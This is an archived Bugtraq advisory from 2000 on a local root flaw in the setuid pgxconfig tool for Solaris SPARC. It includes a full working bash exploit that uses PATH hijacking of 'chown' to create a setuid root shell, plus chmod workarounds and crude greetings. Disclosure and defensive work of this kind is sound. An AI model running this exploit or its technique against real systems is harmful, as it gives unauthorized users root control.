>From owner-bugtraq@SECURITYFOCUS.COM  Wed Aug  2 11:08:46 2000
Return-Path: <owner-bugtraq@SECURITYFOCUS.COM>
Date:         Mon, 2 Aug 0100 11:56:57 +0000
Reply-To: suid@SUID.KG
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: suid@SUID.KG
Subject:      Local root compromise in PGX Config Sun Sparc Solaris
To: BUGTRAQ@SECURITYFOCUS.COM

hi guys and gals

yeah heres something i have had sitting on the shelf until the vendor sent me a
fix. they seem to have done that so here it is. drum roll...

--- Start ---

suid@suid.kg - Raptor GFX config tool local root vulnerability

Short Name:  PGXCONFIG-SPARC
Software:   Raptor GFXtra configuration tool - pgxconfig
URL:    http://www.techsource.com
    ftp://www.techsource.com/download/gfxtra.OWv101.tar.Z
Version:  PGX32 (Raptor GFX) X Window System Support v2.3.1
Platforms:  
    Sun Solaris:
      2.5.1  Sparc
      2.6  Sparc
      7  Sparc
      8  Sparc

Type:     Multiple. Lack of environment sanity checks. Insufficient
    bounds checking. Insecure use of the /tmp dir.
Date:    04 July 2000

Summary:

  Local users can run arbitrary commands as root.

Background:

  Raptor GFX cards are PCI accelerated graphics adapters suitable
  for use in Sun Sparc systems (among others). The associated driver
  and configuration software is distributed for the Sun platform from
  the techsource.com website.

Vulnerability:

  The configuration tool associated with this product is called
  pgxconfig and is installed in /usr/sbin mode 4555 by default.

  Extract from pkgmap:
    1 d none sbin 0775 root bin
    1 s none sbin/GFXconfig=pgxconfig
    1 f none sbin/pgxconfig 4555 root bin 105956 42039 934907098

  With this command it is possible for any user on the system to
  change the openwin configuration. The way this program does
  this is using system("cp"); to copy the existing configuration
  to a backup before overwriting the configuration with
  a new file. Anyway, we all know that Solaris's implementation of
  system() does NOT execute processes with root priviledges when the users
  uid >= 100. However, this particular version of
  pgxconfig does a nice setuid(0); for us. So, while we had euid = 0 from
  being executed as a suid root program, we now have uid = 0 and thus
  system() will execute whatever its told to, as root.

  In this particular program, system is used badly and two things are
  going on.
    
    1. root privileges are not dropped
    2. the environment is not sanitised

  without source I cant show you exactly whats going on in there but the
  result is obviously insecure.

  Its worth noting here (and demonstrating in the exploit) that the
  use of system("cp /whatever /wherever"); isn't the only system()
  call worth exploiting. I've used the easiest one in my exploit
  below.

  Other problems noted but not investigated were multiple command
  line options lacking proper bounds checking and predictable temp
  file creation. It would be a good idea for the vendor to
  perform a complete audit on this product.  

Exploit:
  ---------------------------CUT---------------------------
  #!/usr/local/bin/bash

  # TechSource Raptor GFX configurator root exploit
  # suid@suid.kg

  # unfortunately a compiler must be installed to use this example
  # exploit. however there's a million ways around this you know
  
  # on my system , gcc isnt in my path
  PATH=$PATH:/usr/local/bin

  # build a little prog nothing new here folks
  echo '#include<stdio.h>' > ./x.c
  echo 'int main(void) { setuid(0); setgid(0); execl
("/bin/sh", "/bin/sh", "-i",0);}' >> ./x.c
  gcc x.c -o foobar
  rm -f ./x.c

  # build a substitute chown command. i much prefer this over
        # regular chown
  echo "#!/bin/sh" > chown
  echo "/usr/bin/chown root ./foobar" >> chown
  echo "/usr/bin/chmod 4755 ./foobar" >> chown
  chmod 0755 chown

  # oooh look its the magical fairy path variable
  export PATH=.:$PATH
  
  # heres one way to skin a cat
  # (theres more, some need valid devices. excercise for the readers)
  /usr/sbin/pgxconfig -i
  rm -f chown

  ./foobar

  ----------------------------END--------------------------

Fix:

  No source, no fix. A workaround is:

  Disable /usr/sbin/pgxconfig or /usr/sbin/GFXconfig (or both)
  or at least remove the suid bit.

  # chmod 0 /usr/sbin/pgxconfig

  or

  # chmod 0511 /usr/sbin/pgxconfig

  Until your vendor can issue a fix.

Greets:

  duke - r0x j00r s0x
  cr - m3mb3r 0f t4sk f0rc3 el1t3-p0rn-k1ngz
  yowie - elite greet wh0re
        ratcorpse + par - congrats dudes
  anyone i met at defcon 8 / black hat briefings
  
Thumbs Down:

  Network Solutions - assholes

http://www.suid.edu/advisories/012.txt

--- EOF ---